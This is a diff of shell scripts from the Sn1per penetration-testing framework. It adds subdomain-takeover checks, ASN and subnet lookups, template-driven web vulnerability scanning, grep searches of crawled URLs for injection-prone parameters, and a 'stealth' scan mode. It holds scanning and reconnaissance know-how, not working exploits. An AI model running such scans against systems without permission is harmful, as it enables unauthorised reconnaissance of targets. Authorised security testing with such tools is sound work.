cp $LOOT_DIR/nmap/subover-$TARGET.txt $LOOT_DIR/nmap/subover_old-$TARGET.txt 2> /dev/null
cd ~/go/src/github.com/Ice3man543/SubOver
subover -l $LOOT_DIR/domains/domains-$TARGET-full.txt | tee $LOOT_DIR/nmap/subover-$TARGET 2>/dev/null
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/nmap/subover-$TARGET > $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null
rm -f $LOOT_DIR/nmap/subover-$TARGET 2> /dev/null
diff $LOOT_DIR/nmap/subover_old-$TARGET.txt $LOOT_DIR/nmap/subover-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subover_new-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBOVER_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subover_new-$TARGET.txt"
fi
cd $INSTALL_DIR
fi
if [[ "$SUBJACK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBJACK HIJACKING SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cp $LOOT_DIR/nmap/subjack-$TARGET.txt $LOOT_DIR/nmap/subjack_old-$TARGET.txt 2> /dev/null
~/go/bin/subjack -w $LOOT_DIR/domains/domains-$TARGET-full.txt -c ~/go/src/github.com/haccer/subjack/fingerprints.json -t $THREADS -timeout 30 -o $LOOT_DIR/nmap/subjack-$TARGET.txt -a -v | egrep -v "Not Vulnerable"
diff $LOOT_DIR/nmap/subjack_old-$TARGET.txt $LOOT_DIR/nmap/subjack-$TARGET.txt 2> /dev/null | grep "> " 2> /dev/null | awk '{$1=""; print $0}' 2> /dev/null > $LOOT_DIR/nmap/subjack_new-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBJACK_NEW" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/nmap/subjack_new-$TARGET.txt"
fi
fi
if [[ "$ASN_CHECK" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RETRIEVING ASN INFO $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cd $LOOT_DIR/ips/ 2>/dev/null
asnip -t $TARGET | tee $LOOT_DIR/ips/asn-$TARGET.txt 2>/dev/null
mv $LOOT_DIR/ips/cidrs.txt $LOOT_DIR/ips/cidrs-$TARGET.txt 2>/dev/null
mv $LOOT_DIR/ips/ips.txt $LOOT_DIR/ips/ips-$TARGET.txt 2> /dev/null
cd $INSTALL_DIR 2>/dev/null
fi
if [[ "$SUBNET_RETRIEVAL" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING SUBNET RETRIEVAL $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
curl -s -L --data "ip=$TARGET" https://2ip.me/en/services/information-service/provider-ip\?a\=act | grep -o -E '[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/[0-9]{1,2}' | tee $LOOT_DIR/ips/subnets-$TARGET.txt
if [[ "$SLACK_NOTIFICATIONS_SUBNETS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" postfile "$LOOT_DIR/ips/subnets-$TARGET.txt"
fi
fi
if [[ "$SCAN_ALL_DISCOVERED_DOMAINS" = "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED STARTING FLYOVER SCAN OF ALL DOMAINS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
sniper -f $LOOT_DIR/domains/domains-$TARGET-full.txt -m flyover -w $WORKSPACE
fi
echo "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Finished Sn1per scan: $TARGET [recon] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
fi

18
modes/sc0pe-active-webscan.sh Normal file
View File

@@ -0,0 +1,18 @@
for file in `ls $INSTALL_DIR/templates/active/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "https://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,https://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null
curl --connect-timeout 3 --max-time 5 -k -X $METHOD $CURL_OPTS "http://${TARGET}:${PORT}${URI}" 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME,http://${TARGET}:${PORT}${URI},$(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$PORT-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://${TARGET}:${PORT}${URI} - EVIDENCE: $(cat /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done

20
modes/sc0pe-network-scan.sh Normal file
View File

@@ -0,0 +1,20 @@
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SC0PE NETWORK VULNERABILITY SCAN $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
for file in `ls $INSTALL_DIR/templates/passive/network/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SEARCH" == "negative" ]]; then
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $TARGET - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, $TARGET, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - $FILENME - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done
for file in `ls $INSTALL_DIR/templates/passive/network/recursive/*.sh 2> /dev/null`; do
source $file
done
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"

38
modes/sc0pe-passive-webscan.sh Normal file
View File

@@ -0,0 +1,38 @@
for file in `ls $INSTALL_DIR/templates/passive/web/*.sh 2> /dev/null`; do
source $file
OUTPUT_NAME=$(echo $VULN_NAME | sed -E 's/[^[:alnum:]]+/_/g')
if [[ "$SEARCH" == "negative" ]]; then
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out || echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
else
if [[ "$SSL" == "true" ]]; then
if [[ -z "$PORT" ]]; then
PORT="443"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, https://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: $TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
else
if [[ -z "$PORT" ]]; then
PORT="80"
fi
rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
cat $FILENAME 2> /dev/null | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS 2> /dev/null >/tmp/${TARGET}_${OUTPUT_NAME}.out && echo "$SEVERITY, $VULN_NAME, http://$TARGET:$PORT/$URI, $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && echo "[sn1persecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/${TARGET}_${OUTPUT_NAME}.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt 2> /dev/null
fi
fi
rm -f /tmp/${TARGET}_${OUTPUT_NAME}.out 2> /dev/null
done
for file in `ls $INSTALL_DIR/templates/passive/web/recursive/*.sh 2> /dev/null`; do
source $file
done

36
modes/sc0pe.sh Normal file
View File

@@ -0,0 +1,36 @@
echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1))
echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Low: $LOW_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
sort -u $LOOT_DIR/vulnerabilities/sc0pe-*.txt > $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null
egrep "CRITICAL" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/critical_vulns_total.txt
egrep "HIGH" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/high_vulns_total.txt
egrep "MEDIUM" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/medium_vulns_total.txt
egrep "LOW" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/low_vulns_total.txt
egrep "INFO" $LOOT_DIR/vulnerabilities/sc0pe-all-vulnerabilities-sorted.txt 2> /dev/null | wc -l > $LOOT_DIR/vulnerabilities/info_vulns_total.txt
WORKSPACE_RISK_CRITCAL=$(cat $LOOT_DIR/vulnerabilities/critical_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_HIGH=$(cat $LOOT_DIR/vulnerabilities/high_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_MEDIUM=$(cat $LOOT_DIR/vulnerabilities/medium_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_LOW=$(cat $LOOT_DIR/vulnerabilities/low_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_INFO=$(cat $LOOT_DIR/vulnerabilities/info_vulns_total.txt 2> /dev/null)
WORKSPACE_RISK_TOTAL=$(($WORKSPACE_RISK_CRITCAL*5+$WORKSPACE_RISK_HIGH*4+$WORKSPACE_RISK_MEDIUM*3+$WORKSPACE_RISK_LOW*2+$WORKSPACE_RISK_INFO*1))
echo "$WORKSPACE_RISK_TOTAL" > $LOOT_DIR/vulnerabilities/vuln_score_total.txt 2> /dev/null

46
modes/static-grep-search.sh Normal file
View File

@@ -0,0 +1,46 @@
if [[ $STATIC_GREP_SEARCH == "1" ]]; then
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INTERESTING EXTENSIONS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
cat $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_EXTENSIONS" | tee $LOOT_DIR/web/static-extensions-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING INTERESTING PARAMETERS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_PARAMETERS" | tee $LOOT_DIR/web/static-parameters-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING XSS STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_XSS" | tee $LOOT_DIR/web/static-xss-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SSRF STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSRF" | tee $LOOT_DIR/web/static-ssrf-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING REDIRECT STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_REDIRECT" | tee $LOOT_DIR/web/static-redirect-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING RCE STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_RCE" | tee $LOOT_DIR/web/static-rce-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING IDOR STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_IDOR" | tee $LOOT_DIR/web/static-idor-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SQL STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SQL" | tee $LOOT_DIR/web/static-sql-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING LFI STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_LFI" | tee $LOOT_DIR/web/static-lfi-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING SSTI STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_SSTI" | tee $LOOT_DIR/web/static-ssti-$TARGET.txt | head -n $GREP_MAX_LINES
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
echo -e "$OKRED RUNNING DEBUG STATIC ANALYSIS $RESET"
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
grep '?' $LOOT_DIR/web/spider-$TARGET.txt 2> /dev/null | egrep -iE "$GREP_DEBUG" | tee $LOOT_DIR/web/static-debug-$TARGET.txt | head -n $GREP_MAX_LINES
fi

531
modes/stealth.sh Normal file
View File

@@ -0,0 +1,531 @@
# STEALTH MODE #####################################################################################################
if [[ "$MODE" = "stealth" ]]; then
if [[ "$REPORT" = "1" ]]; then
args="-t $TARGET"
if [[ "$OSINT" = "1" ]]; then
args="$args -o"
fi
if [[ "$AUTO_BRUTE" = "1" ]]; then
args="$args -b"
fi
if [[ "$FULLNMAPSCAN" = "1" ]]; then
args="$args -fp"
fi
if [[ "$RECON" = "1" ]]; then
args="$args -re"
fi
if [[ ! -z "$WORKSPACE" ]]; then
args="$args -w $WORKSPACE"
LOOT_DIR=$INSTALL_DIR/loot/workspace/$WORKSPACE
echo -e "$OKBLUE[*]$RESET Saving loot to $LOOT_DIR $OKBLUE[$RESET${OKGREEN}OK${RESET}$OKBLUE]$RESET"
mkdir -p $LOOT_DIR 2> /dev/null
mkdir $LOOT_DIR/domains 2> /dev/null
mkdir $LOOT_DIR/screenshots 2> /dev/null
mkdir $LOOT_DIR/nmap 2> /dev/null
mkdir $LOOT_DIR/notes 2> /dev/null
mkdir $LOOT_DIR/reports 2> /dev/null
mkdir $LOOT_DIR/scans 2> /dev/null
mkdir $LOOT_DIR/output 2> /dev/null
fi
args="$args --noreport -m stealth"
echo "$TARGET $MODE `date +"%Y-%m-%d %H:%M"`" 2> /dev/null >> $LOOT_DIR/scans/tasks.txt 2> /dev/null
echo "sniper -t $TARGET -m $MODE --noreport $args" >> $LOOT_DIR/scans/$TARGET-$MODE.txt
echo "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications_new.txt
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[sn1persecurity.com] •?((¯°·._.• Started Sn1per scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
fi
sniper $args | tee $LOOT_DIR/output/sniper-$TARGET-$MODE-`date +"%Y%m%d%H%M"`.txt 2>&1
exit
fi
echo -e "$OKRED ____ $RESET"
echo -e "$OKRED _________ / _/___ ___ _____$RESET"
echo -e "$OKRED / ___/ __ \ / // __ \/ _ \/ ___/$RESET"
echo -e "$OKRED (__ ) / / // // /_/ / __/ / $RESET"
echo -e "$OKRED /____/_/ /_/___/ .___/\___/_/ $RESET"
echo -e "$OKRED /_/ $RESET"
echo -e "$RESET"
echo -e "$OKORANGE + -- --=[ https://sn1persecurity.com"
echo -e "$OKORANGE + -- --=[ Sn1per v$VER by @xer0dayz"
echo -e "$OKRED "
echo -e "$OKRED ./\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED \. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED '\. '\."
echo -e "$OKRED ./ '\."
echo -e "$OKRED ./ ____'\."
echo -e "$OKRED ./ < '\."
echo -e "$OKRED \-------\ '> '\."
